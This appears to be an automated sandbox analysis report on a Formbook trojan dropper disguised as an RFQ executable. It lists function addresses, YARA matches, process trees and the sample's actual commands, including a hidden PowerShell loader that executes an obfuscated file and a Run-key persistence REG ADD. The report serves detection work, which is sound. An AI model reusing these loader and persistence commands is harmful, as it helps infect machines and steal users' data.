Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321132D	12_2_2321132D
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314D34C	12_2_2314D34C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321A352	12_2_2321A352
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231A739A	12_2_231A739A
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232203E6	12_2_232203E6
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316E3F0	12_2_2316E3F0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23200274	12_2_23200274
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231652A0	12_2_231652A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232012ED	12_2_232012ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317B2C0	12_2_2317B2C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E02C0	12_2_231E02C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317D2F0	12_2_2317D2F0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231FA118	12_2_231FA118
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23150100	12_2_23150100
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E8158	12_2_231E8158
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2322B16B	12_2_2322B16B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172	12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2319516C	12_2_2319516C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232201AA	12_2_232201AA
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316B1B0	12_2_2316B1B0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232181CC	12_2_232181CC
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321F0E0	12_2_2321F0E0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232170E9	12_2_232170E9
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0	12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2320F0CC	12_2_2320F0CC
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23184750	12_2_23184750
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23160770	12_2_23160770
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321F7B0	12_2_2321F7B0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315C7C0	12_2_2315C7C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232116CC	12_2_232116CC
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317C6E0	12_2_2317C6E0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23160535	12_2_23160535
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23217571	12_2_23217571
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231FD5B0	12_2_231FD5B0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23220591	12_2_23220591
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321F43F	12_2_2321F43F
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23212446	12_2_23212446
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23151460	12_2_23151460
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2320E4F6	12_2_2320E4F6
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321FB76	12_2_2321FB76
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321AB40	12_2_2321AB40
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_0216F21B	17_2_0216F21B
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_0216D29B	17_2_0216D29B
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_0216412C	17_2_0216412C
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_0218C95B	17_2_0218C95B
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_0217597B	17_2_0217597B
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_02173E1B	17_2_02173E1B
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_02163F2F	17_2_02163F2F
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_0216EFF3	17_2_0216EFF3
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_0216EFFB	17_2_0216EFFB
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_04D71D47	17_2_04D71D47
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_04D5AD67	17_2_04D5AD67
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_04D49518	17_2_04D49518
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_04D52687	17_2_04D52687
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_04D54607	17_2_04D54607
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_04D543DF	17_2_04D543DF
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_04D543E7	17_2_04D543E7
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_04D4931B	17_2_04D4931B
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C8B2C0	18_2_02C8B2C0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CF02C0	18_2_02CF02C0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C8D2F0	18_2_02C8D2F0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D112ED	18_2_02D112ED
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C752A0	18_2_02C752A0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D10274	18_2_02D10274
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D303E6	18_2_02D303E6
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C7E3F0	18_2_02C7E3F0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CB739A	18_2_02CB739A
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D2A352	18_2_02D2A352
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C5D34C	18_2_02C5D34C
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D2132D	18_2_02D2132D
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C770C0	18_2_02C770C0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D1F0CC	18_2_02D1F0CC
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D2F0E0	18_2_02D2F0E0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D270E9	18_2_02D270E9
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D281CC	18_2_02D281CC
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C7B1B0	18_2_02C7B1B0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D301AA	18_2_02D301AA
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CF8158	18_2_02CF8158
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA516C	18_2_02CA516C
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C5F172	18_2_02C5F172
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D3B16B	18_2_02D3B16B
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C60100	18_2_02C60100
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D0A118	18_2_02D0A118
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D216CC	18_2_02D216CC
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C8C6E0	18_2_02C8C6E0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C6C7C0	18_2_02C6C7C0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D2F7B0	18_2_02D2F7B0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C94750	18_2_02C94750
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C70770	18_2_02C70770
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D1E4F6	18_2_02D1E4F6
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D22446	18_2_02D22446
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C61460	18_2_02C61460
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D2F43F	18_2_02D2F43F
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D30591	18_2_02D30591
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D0D5B0	18_2_02D0D5B0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D27571	18_2_02D27571
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C70535	18_2_02C70535
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D1DAC6	18_2_02D1DAC6
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C6EA80	18_2_02C6EA80
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CB5AA0	18_2_02CB5AA0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D0DAAC	18_2_02D0DAAC
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D27A46	18_2_02D27A46
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D2FA49	18_2_02D2FA49
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CE3A6C	18_2_02CE3A6C
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D26BD7	18_2_02D26BD7
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CADBF9	18_2_02CADBF9
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CE5BF0	18_2_02CE5BF0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C8FB80	18_2_02C8FB80
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D2AB40	18_2_02D2AB40
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D2FB76	18_2_02D2FB76
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C738E0	18_2_02C738E0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C9E8F0	18_2_02C9E8F0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C568B8	18_2_02C568B8
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C72840	18_2_02C72840
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C7A840	18_2_02C7A840
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CDD800	18_2_02CDD800
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C729A0	18_2_02C729A0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D3A9A6	18_2_02D3A9A6
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C79950	18_2_02C79950
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C8B950	18_2_02C8B950
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C86962	18_2_02C86962
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D2EEDB	18_2_02D2EEDB
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D2CE93	18_2_02D2CE93
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C82E90	18_2_02C82E90
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C79EB0	18_2_02C79EB0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C70E59	18_2_02C70E59
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D2EE26	18_2_02D2EE26
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C62FC8	18_2_02C62FC8
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C71F92	18_2_02C71F92
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D2FFB1	18_2_02D2FFB1
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CEEFA0	18_2_02CEEFA0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CE4F40	18_2_02CE4F40
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D2FF09	18_2_02D2FF09
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CB2F28	18_2_02CB2F28
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C90F30	18_2_02C90F30
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D2FCF2	18_2_02D2FCF2
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C60CF2	18_2_02C60CF2
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D10CB5	18_2_02D10CB5
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C70C00	18_2_02C70C00
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CE9C32	18_2_02CE9C32
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C8FDC0	18_2_02C8FDC0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C6ADE0	18_2_02C6ADE0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C88DBF	18_2_02C88DBF
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C73D40	18_2_02C73D40
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D21D5A	18_2_02D21D5A
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D27D73	18_2_02D27D73
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C7AD00	18_2_02C7AD00
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_00121090	18_2_00121090
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_001111A4	18_2_001111A4
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_0011C270	18_2_0011C270
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_0011C268	18_2_0011C268
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_001113A1	18_2_001113A1
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_0011C490	18_2_0011C490
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_0011A510	18_2_0011A510
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_00139BD0	18_2_00139BD0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_00122BF0	18_2_00122BF0

Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: String function: 2314B970 appears 126 times
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: String function: 231A7E54 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: String function: 231DF290 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: String function: 231CEA12 appears 58 times
Source: C:\Windows\SysWOW64\fc.exe	Code function: String function: 02C5B970 appears 254 times
Source: C:\Windows\SysWOW64\fc.exe	Code function: String function: 02CB7E54 appears 95 times
Source: C:\Windows\SysWOW64\fc.exe	Code function: String function: 02CDEA12 appears 86 times
Source: C:\Windows\SysWOW64\fc.exe	Code function: String function: 02CEF290 appears 103 times
Source: C:\Windows\SysWOW64\fc.exe	Code function: String function: 02CA5130 appears 36 times

Source: RFQ-LOTUS 2024.exe

Static PE information: invalid certificate

Source: RFQ-LOTUS 2024.exe, 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenameexchangeable rehidden.exe4 vs RFQ-LOTUS 2024.exe

Source: RFQ-LOTUS 2024.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Paraferingen" /t REG_EXPAND_SZ /d "%Uhelds% -windowstyle minimized $Sivsanger=(Get-ItemProperty -Path 'HKCU:\Arkitekttegningers\').Daughterling;%Uhelds% ($Sivsanger)"

Source: 00000012.00000002.4124828418.00000000007C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.4125392542.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.4124789568.0000000002160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.4124881120.0000000000800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.2939523462.0000000022E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.4123618646.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@38/19@16/13

Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe

0_2_0040327D

Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe

File created: C:\Users\user\AppData\Roaming\frikirkernes

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6552:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03

Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe

File created: C:\Users\user\AppData\Local\Temp\nsx8F79.tmp

Jump to behavior

Source: RFQ-LOTUS 2024.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process

Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RFQ-LOTUS 2024.exe	ReversingLabs: Detection: 18%
Source: RFQ-LOTUS 2024.exe	Virustotal: Detection: 36%

Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe

File read: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe "C:\Users\user\Desktop\RFQ-LOTUS 2024.exe"
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Superambitiously.Teg';$Steticismes=$Stabejsernes.SubString(8485,3);.$Steticismes($Stabejsernes)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://473750571567004317064230583514468350804565684324378075159610742091604698238217701484029465762430135913242023857750034401559054060945654540273638867228794983640833862748912121851334807031249099092790952130035074227943842970399582505875/
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1684 --field-trial-handle=1844,i,13896805619792055621,4904984186317892360,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=2052,i,55276660867092157,14850349657690875544,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Minken.exe "C:\Users\user\AppData\Local\Temp\Minken.exe"
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Paraferingen" /t REG_EXPAND_SZ /d "%Uhelds% -windowstyle minimized $Sivsanger=(Get-ItemProperty -Path 'HKCU:\Arkitekttegningers\').Daughterling;%Uhelds% ($Sivsanger)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Paraferingen" /t REG_EXPAND_SZ /d "%Uhelds% -windowstyle minimized $Sivsanger=(Get-ItemProperty -Path 'HKCU:\Arkitekttegningers\').Daughterling;%Uhelds% ($Sivsanger)"
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Process created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"
Source: C:\Windows\SysWOW64\fc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Superambitiously.Teg';$Steticismes=$Stabejsernes.SubString(8485,3);.$Steticismes($Stabejsernes)"	Jump to behavior
